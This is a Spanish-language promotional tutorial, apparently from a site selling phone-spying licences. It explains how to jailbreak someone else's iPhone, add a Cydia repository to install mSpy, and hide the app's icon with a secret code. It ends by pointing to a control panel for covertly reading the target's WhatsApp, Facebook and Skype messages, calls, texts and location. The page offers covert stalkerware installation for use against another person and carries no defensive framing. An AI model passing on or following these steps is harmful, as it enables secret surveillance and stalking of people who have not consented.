COMO ESPIAR UN IPHONE

¿ COMO ESPIAR UN IPHONE ? PASOS PARA INSTALAR LA APLICACIÓN ESPÍA DE TELÉFONOS CELULARES MSPY EN IPHONE

Si desea monitorear un iPhone de manera remota o sin jailbreak Clic Aquí

¿ Que es el Jailbreak ?

En esencia, realizar un jailbreak en tu iPhone significa liberarlo de las limitaciones impuestas por la compañía de Apple.

Básicamente el procedimiento es sencillo, usted instala un programa en su computadora, luego lo transfiere a su iPhone donde lo libera y abre el sistema de archivos permitiendo su modificación para la instalación de aplicaciones de terceros.

Un dispositivo con jailbreak todavía puede usar la App Store, iTunes y todas las demás funciones, como hacer llamadas telefónicas.

El jailbreak es una forma de escalado de privilegios, y el término se ha usado también con otros sistemas computacionales.

Puede realizar su jailbreak de forma 100% segura y a cualquier versión

Las ventajas de espiar un iPhone con Jailbreak son que podrá tener un mayor numero de funciones espías disponibles, podrá espiar Whatsapp, espiar Skype, espiar Facebook, llamadas, mensajes y más


En el iPhone que desea monitorear buscar el icono de Cydia e iniciarlo, después vaya a -> Fuentes-> Editar-> Añadir para agregar la siguiente dirección http://kayıtspy.com/repo/?p=(numero de licencia)

Descargar MSpy

La descarga iniciara y presionamos regresar a Cydia

Después de descargar, vaya al repositorio Mtechnology LTD y seleccione iphoneinternalservice:


Una nueva ventana con los detalles de mSpy se abrirá, seleccione -> Instalar ->Confirmar.

Como espiar un iPhone

Ahora ejecute la aplicación en el dispositivo objetivo, presione Acepto los términos de licencia, inserte su numero de licencia y presione el botón continuar.

Espiar iPhone

Si desea ocultar el icono, simplemente vaya al buscador de su iPhone, e introduzca el código: 4433*29342 y pulsa el botón de búsqueda, este código es por defecto para ocultar y mostrar el icono.

Por ahora se ha instalado con éxito el software espía mSpy en el iPhone que desea espiar.

Ahora viene la parte de espionaje remoto donde la información será accesible desde el panel de control en línea, en el podrá ver las llamadas realizadas, podrá espiar Whastapp, mensajes, ver la ubicación, espiar Facebook, espiar Skype y más.


Ahora que ya sabe como espiar un iPhone adquiera su licencia y comience a espiar

Ver Funciones

EspiaDeCelulares.Com